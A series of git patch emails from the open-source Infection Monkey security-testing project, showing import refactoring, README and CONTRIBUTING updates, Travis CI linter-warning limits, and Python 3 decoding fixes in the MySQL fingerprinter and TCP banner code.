b/monkey/monkey_island/cc/app.py @@ -21,18 +21,18 @@ from monkey_island.cc.resources.netmap import NetMap from monkey_island.cc.resources.node import Node from monkey_island.cc.resources.remote_run import RemoteRun from monkey_island.cc.resources.reporting.report import Report -from monkey_island.cc.resources.representations import output_json from monkey_island.cc.resources.root import Root from monkey_island.cc.resources.telemetry import Telemetry from monkey_island.cc.resources.telemetry_feed import TelemetryFeed from monkey_island.cc.resources.pba_file_download import PBAFileDownload from monkey_island.cc.resources.version_update import VersionUpdate -from monkey_island.cc.services.database import Database -from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH -from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService from monkey_island.cc.resources.pba_file_upload import FileUpload from monkey_island.cc.resources.attack.attack_config import AttackConfiguration from monkey_island.cc.resources.attack.attack_report import AttackReport +from monkey_island.cc.services.database import Database +from monkey_island.cc.services.remote_run_aws import RemoteRunAwsService +from monkey_island.cc.services.representations import output_json +from monkey_island.cc.consts import MONKEY_ISLAND_ABS_PATH from monkey_island.cc.resources.test.monkey_test import MonkeyTest from monkey_island.cc.resources.test.log_test import LogTest diff --git a/monkey/monkey_island/cc/resources/representations.py b/monkey/monkey_island/cc/services/representations.py similarity index 100% rename from monkey/monkey_island/cc/resources/representations.py rename to monkey/monkey_island/cc/services/representations.py diff --git a/monkey/monkey_island/cc/resources/representations_test.py b/monkey/monkey_island/cc/services/representations_test.py similarity index 95% rename from monkey/monkey_island/cc/resources/representations_test.py rename to monkey/monkey_island/cc/services/representations_test.py index c50394117..d6c7f99d7 100644 --- a/monkey/monkey_island/cc/resources/representations_test.py +++ b/monkey/monkey_island/cc/services/representations_test.py @@ -1,6 +1,6 @@ from unittest import TestCase from datetime import datetime -from .representations import normalize_obj +from monkey_island.cc.services.representations import normalize_obj import bson From c68ea48b0b8f08044753abc19858b387292472cd Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 10:19:39 +0200 Subject: [PATCH 45/53] Added unit tests guide to the readme. --- README.md | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index 2d7490bfe..dd1d7982b 100644 --- a/README.md +++ b/README.md @@ -1,31 +1,27 @@ -Infection Monkey -==================== +# Infection Monkey [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) [![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases) ![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey) ![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey) ## Data center Security Testing Tool ------------------------- Welcome to the Infection Monkey! The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server. - + The Infection Monkey is comprised of two parts: * Monkey - A tool which infects other machines and propagates to them * Monkey Island - A dedicated server to control and visualize the Infection Monkey's progress inside the data center To read more about the Monkey, visit http://infectionmonkey.com -Main Features ---------------- - +## Main Features The Infection Monkey uses the following techniques and exploits to propagate to other machines. * Multiple propagation techniques: @@ -41,15 +37,13 @@ The Infection Monkey uses the following techniques and exploits to propagate to * SambaCry * Elastic Search (CVE-2015-1427) -Setup -------------------------------- +## Setup Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/). The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility). -Building the Monkey from source -------------------------------- +## Building the Monkey from source To deploy development version of monkey you should refer to readme in the [deployment scripts](deployment_scripts) folder. If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself) and follow the instructions at the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island). @@ -61,8 +55,14 @@ and follow the instructions at the readme files under [infection_monkey](infecti | Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) | | Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) | -License -======= +## Tests +### Unit Tests +In order to run all of the Unit Tests, run the command `python -m pytest` in the `monkey` directory. + +### Blackbox tests +In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`. + +# License Copyright (c) Guardicore Ltd See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3). From ea5ae678912bbf15a81119213c5efbddadf27cca Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:05:45 +0200 Subject: [PATCH 46/53] Updated flake8 to fail if number of warnings is too high --- .travis.yml | 28 +++++++++++++++++++++++----- 1 file changed, 23 insertions(+), 5 deletions(-) diff --git a/.travis.yml b/.travis.yml index d5103b989..365432f24 100644 --- a/.travis.yml +++ b/.travis.yml @@ -1,23 +1,41 @@ # Infection Monkey travis.yml. See Travis documentation for information about this file structure. group: travis_latest + language: python + cache: pip + python: - 3.7 + install: - pip install -r monkey/monkey_island/requirements.txt # for unit tests - pip install flake8 pytest dlint # for next stages - pip install -r monkey/infection_monkey/requirements_linux.txt # for unit tests + before_script: -- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics # Check syntax errors -- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics # warn about linter issues. --exit-zero - # means this stage will not fail the build. This is (hopefully) a temporary measure until all warnings are suppressed. -- python monkey/monkey_island/cc/set_server_config.py testing # Set the server config to `testing`, for the UTs to use - # mongomaock and pass. +# Check syntax errors and fail the build if any are found. +- flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics + +# Warn about linter issues. +# --exit-zero forces Flake8 to use the exit status code 0 even if there are errors, which means this will NOT fail the build. +# --count will print the total number of errors. +# --statistics Count the number of occurrences of each error/warning code and print a report. +# The output is redirected to a file. +- flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics > flake8_warnings.txt +# Display the linter issues +- cat flake8_warnings.txt +# Make sure that we haven't increased the amount of warnings. +- test (`tail -n 1 flake8_warnings.txt` -lt 180) + +# Set the server config to `testing`, for the UTs to use mongomaock and pass. +- python monkey/monkey_island/cc/set_server_config.py testing + script: - cd monkey # This is our source dir - python -m pytest # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path. + notifications: slack: # Notify to slack rooms: From d52d00e5d9bfa75c100d2dcabbf81964241a1897 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:13:38 +0200 Subject: [PATCH 47/53] Trying to make the test work --- .travis.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 365432f24..fb773b387 100644 --- a/.travis.yml +++ b/.travis.yml @@ -27,7 +27,8 @@ before_script: # Display the linter issues - cat flake8_warnings.txt # Make sure that we haven't increased the amount of warnings. -- test (`tail -n 1 flake8_warnings.txt` -lt 180) +- WARNINGS_AMOUNT_UPPER_LIMIT=180 +- if (test $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT); echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi # Set the server config to `testing`, for the UTs to use mongomaock and pass. - python monkey/monkey_island/cc/set_server_config.py testing From bbdc12a412d0c6d3678f2729dd4cc4b77610b176 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:19:46 +0200 Subject: [PATCH 48/53] Update .travis.yml --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index fb773b387..44163be0d 100644 --- a/.travis.yml +++ b/.travis.yml @@ -28,7 +28,7 @@ before_script: - cat flake8_warnings.txt # Make sure that we haven't increased the amount of warnings. - WARNINGS_AMOUNT_UPPER_LIMIT=180 -- if (test $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT); echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi +- if [ $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi # Set the server config to `testing`, for the UTs to use mongomaock and pass. - python monkey/monkey_island/cc/set_server_config.py testing From c69766650cebb56bc3f563cdc43390947fa8a280 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 12:22:55 +0200 Subject: [PATCH 49/53] Update upper limit to actual current amount of linter warnings --- .travis.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.travis.yml b/.travis.yml index 44163be0d..d6b9ca212 100644 --- a/.travis.yml +++ b/.travis.yml @@ -27,7 +27,7 @@ before_script: # Display the linter issues - cat flake8_warnings.txt # Make sure that we haven't increased the amount of warnings. -- WARNINGS_AMOUNT_UPPER_LIMIT=180 +- WARNINGS_AMOUNT_UPPER_LIMIT=190 - if [ $(tail -n 1 flake8_warnings.txt) -gt $WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many warnings! Failing this build. Lower the amount of linter errors in this and try again. " && exit 1; fi # Set the server config to `testing`, for the UTs to use mongomaock and pass. From fc063a53781a3f35c52ceb7bfde7b9ccdc37ff46 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Tue, 5 Nov 2019 12:37:51 +0200 Subject: [PATCH 50/53] Fixed mysql finger printer py3 bugs --- monkey/infection_monkey/network/mysqlfinger.py | 2 +- monkey/infection_monkey/network/tools.py | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/monkey/infection_monkey/network/mysqlfinger.py b/monkey/infection_monkey/network/mysqlfinger.py index 123f0ae47..2b9a7c702 100644 --- a/monkey/infection_monkey/network/mysqlfinger.py +++ b/monkey/infection_monkey/network/mysqlfinger.py @@ -50,7 +50,7 @@ class MySQLFinger(HostFinger): return False version, curpos = struct_unpack_tracker_string(data, curpos) # special coded to solve string parsing - version = version[0] + version = version[0].decode() self.init_service(host.services, SQL_SERVICE, MYSQL_PORT) host.services[SQL_SERVICE]['version'] = version version = version.split('-')[0].split('.') diff --git a/monkey/infection_monkey/network/tools.py b/monkey/infection_monkey/network/tools.py index 0cac7b627..ee20af834 100644 --- a/monkey/infection_monkey/network/tools.py +++ b/monkey/infection_monkey/network/tools.py @@ -40,7 +40,7 @@ def struct_unpack_tracker_string(data, index): :param index: Position index :return: (Data, new index) """ - ascii_len = data[index:].find('\0') + ascii_len = data[index:].find(b'\0') fmt = "%ds" % ascii_len return struct_unpack_tracker(data, index, fmt) @@ -159,7 +159,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False): if get_banner and (len(connected_ports_sockets) != 0): readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0) # read first BANNER_READ bytes - banners = [sock.recv(BANNER_READ).decode() if sock in readable_sockets else "" + banners = [sock.recv(BANNER_READ).decode(errors='ignore') if sock in readable_sockets else "" for port, sock in connected_ports_sockets] pass # try to cleanup From 63d0e57bb740fad42dbb9fc3dc9bfddfcbca4df4 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Tue, 5 Nov 2019 13:11:15 +0200 Subject: [PATCH 51/53] Added documentation on why we ignore errors when getting tcp banner --- monkey/infection_monkey/network/tools.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/monkey/infection_monkey/network/tools.py b/monkey/infection_monkey/network/tools.py index ee20af834..20d004aff 100644 --- a/monkey/infection_monkey/network/tools.py +++ b/monkey/infection_monkey/network/tools.py @@ -158,7 +158,7 @@ def check_tcp_ports(ip, ports, timeout=DEFAULT_TIMEOUT, get_banner=False): banners = [] if get_banner and (len(connected_ports_sockets) != 0): readable_sockets, _, _ = select.select([s[1] for s in connected_ports_sockets], [], [], 0) - # read first BANNER_READ bytes + # read first BANNER_READ bytes. We ignore errors because service might not send a decodable byte string. banners = [sock.recv(BANNER_READ).decode(errors='ignore') if sock in readable_sockets else "" for port, sock in connected_ports_sockets] pass From 211a4e9d341f69949808db7018bbd970d753c5c8 Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 13:59:42 +0200 Subject: [PATCH 52/53] Update CONTRIBUTING.md --- CONTRIBUTING.md | 26 ++++++++++++++++++-------- 1 file changed, 18 insertions(+), 8 deletions(-) diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 035eb0124..08a78a815 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -1,4 +1,4 @@ -# Hi there +# Hi there 🐵 Thanks for your interest in making the Monkey -- and therefore, your network -- a better place! @@ -10,8 +10,13 @@ to reproduce. While we'll try to help anyway, focusing us will help us help you If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk). +## Submitting Issues +* **Do** write a detailed description of your bug and use a descriptive title. +* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug. -## Submitting code +You can look at [this issue](https://github.com/guardicore/monkey/issues/430) for an example. + +## Submitting Code The following is a *short* list of recommendations. PRs that don't match these criteria won't be closed but it'll be harder to merge the changes into the code. @@ -24,18 +29,23 @@ The following is a *short* list of recommendations. PRs that don't match these c Also, please submit PRs to the `develop` branch. -#### Unit tests +#### Unit Tests **Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`. Please try to read some of the existing unit testing code, so you can see some examples. -#### Branch naming scheme +#### Branches Naming Scheme **Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; For example, `400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`. -## Issues -* **Do** write a detailed description of your bug and use a descriptive title. -* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug. +#### Continuous Integration +We use [TravisCI](https://travis-ci.com/guardicore/monkey) for automatically checking the correctness and quality of submitted +pull requests. If your build fails, it might be because of one of the following reasons: +* Syntax errors. +* Failing Unit Tests. +* Too many linter warnings. -Thank you for reading this before opening an issue or a PR, you've already doing good! +In any of these cases, you can look for the cause of the failure in the _job log_ in your TravisCI build. + +#### Thank you for reading this before opening an issue or a PR, you're already doing good! From 372d62fb91c43ce2361f6f1621be486640224c2c Mon Sep 17 00:00:00 2001 From: Shay Nehmad Date: Tue, 5 Nov 2019 17:02:40 +0200 Subject: [PATCH 53/53] Fix imports in processing --- .../cc/services/telemetry/processing/processing.py | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/monkey/monkey_island/cc/services/telemetry/processing/processing.py b/monkey/monkey_island/cc/services/telemetry/processing/processing.py index f6ddcd970..0cc461249 100644 --- a/monkey/monkey_island/cc/services/telemetry/processing/processing.py +++ b/monkey/monkey_island/cc/services/telemetry/processing/processing.py @@ -1,7 +1,11 @@ import logging -from monkey_island.cc.services.telemetry.processing import process_tunnel_telemetry, process_state_telemetry, \ - process_exploit_telemetry, process_scan_telemetry, process_system_info_telemetry, process_post_breach_telemetry +from monkey_island.cc.services.telemetry.processing.exploit import process_exploit_telemetry +from monkey_island.cc.services.telemetry.processing.post_breach import process_post_breach_telemetry +from monkey_island.cc.services.telemetry.processing.scan import process_scan_telemetry +from monkey_island.cc.services.telemetry.processing.state import process_state_telemetry +from monkey_island.cc.services.telemetry.processing.system_info import process_system_info_telemetry +from monkey_island.cc.services.telemetry.processing.tunnel import process_tunnel_telemetry logger = logging.getLogger(__name__)